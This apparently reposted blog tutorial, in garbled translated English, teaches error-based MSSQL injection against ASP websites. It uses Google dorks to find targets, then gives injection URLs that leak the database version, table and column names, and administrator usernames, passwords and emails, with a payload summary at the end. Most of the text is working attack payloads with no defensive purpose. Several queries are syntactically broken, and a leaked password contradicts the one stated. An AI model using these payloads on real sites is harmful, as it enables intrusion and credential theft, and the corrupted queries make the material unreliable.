MSSQL Injection - Method Of Attack
MSSQL - injection, method of attack!
###########################
1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?
[1.1 Introduction]
############
This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.
There are several types of attacks in this way:
* - Normal MSSQL SQL Injection attacks
* - MSSQL injection in Web services (SOAP injection)
* - Union with MSSQL injection attack
* - ODBC error attack the "Convert"
* - MSSQL Blind SQL Injection attacks, etc. ..
For this will be used for writing this type of attack:
"Attack of the ODBC error message" Convert "
[1.2 How to ask Vulnerability page? ]
############################
How to ask who Vulnerability page is easy. This can use Google services company giant.
Let's open: Google
I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
ETC ....( I decided some examples, you can now use the logic, for better dorks)
[1.3 How to prove that the site of weakness? ]
##################################
So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example:
++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection.
Should now act as an example here, and where to put high ( ').
For example:
--------------------------------------
http://www.localhost.com/ / news.asp? id = 100 '
--------------------------------------
Now we can say that the error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
This page has weaknesses!
[1.4 How to find version 2.4 / DB name? ]
############################
Let the example easier to understand:
Version:
-------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (@ @ version)) --
-------------------------------------------------- ------------------
And we have presented an example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM), a data type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Now go find DB_Name:
-------------------------------------------------- -------------------
http://www.localhost.com/ /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))--
-------------------------------------------------- -------------------
eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
[1.5 How to discover the names table (table_name)]
######################################
Because it is discovered, or simply to find the side of the table goes through this method.
For example:
-------------------------------------------------- -------------------------------------------------- --------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- --------------
And now there will be a mistake, such as:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value of users' data on the type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
That is, in this case the table (table_name) The first is the 'Users', now find the following table:
For example:
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
And now an error message will appear the same and will give another table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not news when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Another table in this case is 'news'
Now to find the table (table_name) third goes like this:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
I appear to us the third table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value categories' of data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Then the third table 'categories', and so on until you find all the tables.
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
[1.6 How to discover the names of column (column_name)]
###########################################
-If you want to column_name for users as' go:
For example:
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'Name' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So colums name for the table (table_name) 'Users' the 'name'
Now find the column (column_name) other at the same table 'Users':
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not a password when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
columnes name (column_name) the other is 'password', now go find a rotating column_name:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'emailaddress' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!
[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###
To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.
In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!
Some have now replaced the example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not an administrator when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
user name : Administrator
Replacing now the first column "Name" in the second column "password":
For example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value '123456 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
password: administratorpassword123
Now, instead of rotating columns works the same as above:
For example:
-------------------------------------------------- ---------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) --
-------------------------------------------------- ---------------------------------------------
emailaddress: king.cyborg@yahoo.com
Here then we have achieved some info on, and the name / pass and emailaddress page.
user name: Administrator
password: administratorpassword123
emailaddress: [email]king.cyborg@yahoo.com/email]
[ 1.8 Conclusion ]
############
================================================== ===========================
www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
================================================== ===========================
No hay comentarios:
Publicar un comentario